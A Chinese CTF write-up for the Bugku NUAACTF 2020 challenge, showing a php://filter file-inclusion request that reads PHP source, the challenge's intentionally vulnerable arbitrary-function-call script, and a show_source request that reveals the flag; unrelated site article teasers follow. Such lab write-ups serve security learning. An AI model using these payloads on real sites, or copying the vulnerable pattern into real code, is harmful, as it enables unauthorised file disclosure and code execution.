news 2026/5/23 19:23:10

Bugku NUAACTF 2020 command-injection

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Bugku NUAACTF 2020 command-injection

前置知识

网络安全 文件包含漏洞-CSDN博客

解题过程

打开靶场、进行信息收集

在源码中发现include文件,直接访问,自动添加了URL参数file

/include.php?file=index

并且自动补齐了index参数,页面也跟初始页面相同,很明显是文件包含漏洞

直接尝试php伪协议读取下已知的源码,根据自动补齐的index参数,可以猜测后端是自动补齐.php,读取index.php:

/include.php?file=php://filter/read=convert.base64-encode/resource=index
<?php print <<<EOT <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <!--include.php--> <img src="img.jpg" alt="嘉木天下第一" /> </body> </html> EOT; ?>

读取include.php:

/include.php?file=php://filter/read=convert.base64-encode/resource=include
<?php error_reporting(0); @$file = $_GET["file"]; if(isset($file)) { if (preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) { echo "<p> error! </p>"; } else { include($file.'.php'); setcookie("tips","createfun.php"); } } else { header('Location:include.php?file=index'); } ?>

可以看到include.php过滤了敏感字符,我们无法直接读取flag

并且我们又看到另一个文件createfun.php,继续读取该文件:

/include.php?file=php://filter/read=convert.base64-encode/resource=createfun
<?php $func = @$_GET['func']; $arg = @$_GET['arg']; if(isset($func)&&isset($arg)){$func($arg,'');}

分析源码,获取两个参数,一个作为函数名,一个作为函数参数,然后会执行函数。

需要注意这个函数有两个参数,后面被自动设置为空,这里很多函数可以用,这里采用show_source,显示flag.php文件内容,这里flag.php可以通过前面include文件得出,也可以扫文件得到:

/createfun.php?func=show_source&arg=flag.php
<?php $flag="nuaactf{php_IS_thE_best_language}"; ?>

总结

一道基础的文件包含漏洞,包含了一些代码审计部分。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/23 3:39:29

10 分钟落地!大模型联网搜索 API 极速接入指南

对 AI 开发者而言&#xff0c;让模型 “看懂当下” 往往要闯三道关&#xff1a;检索引擎选型、实时数据解析、API 适配调试。但数眼智能等厂商的实践证明&#xff0c;联网能力落地完全可以更高效 —— 其支持的分钟级联网应用搭建&#xff0c;正是依托极简 API 集成思路。本文将…

作者头像 李华
网站建设 2026/5/18 15:03:48

SuperOffload技术革命:突破70B大模型训练极限的架构创新

SuperOffload技术革命&#xff1a;突破70B大模型训练极限的架构创新 【免费下载链接】DeepSpeedExamples Example models using DeepSpeed 项目地址: https://gitcode.com/gh_mirrors/de/DeepSpeedExamples 在AI大模型快速发展的今天&#xff0c;训练效率已成为制约技术…

作者头像 李华
网站建设 2026/5/20 22:22:10

Tencent Kona SM Suite:构建企业级国密安全体系的Java技术实践

在数字化转型浪潮中&#xff0c;密码安全已成为企业核心竞争力的重要组成部分。作为腾讯开源的Java国密算法套件&#xff0c;Tencent Kona SM Suite为企业提供了从基础密码学算法到高层安全协议的完整解决方案。本文将从技术实现原理到实际应用场景&#xff0c;全面解析这套安全…

作者头像 李华
网站建设 2026/5/10 9:06:10

前端开发者必备:CSS3十六进制透明度使用全攻略(附避坑指南)

前端开发者必备&#xff1a;CSS3十六进制透明度使用全攻略&#xff08;附避坑指南&#xff09;前端开发者必备&#xff1a;CSS3十六进制透明度使用全攻略&#xff08;附避坑指南&#xff09;为什么你还在用 rgba&#xff1f;CSS3 十六进制透明度悄然改变样式写法从 #RRGGBB 到 …

作者头像 李华
网站建设 2026/5/10 21:05:08

企业级数据库RAID10实战配置指南

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容&#xff1a; 开发一个MySQL数据库RAID10配置评估工具&#xff0c;能根据数据库规模(表数量、数据量、IOPS需求)推荐最佳RAID10配置方案。工具需要包含&#xff1a;1)磁盘选型建议 2)条带大小计算…

作者头像 李华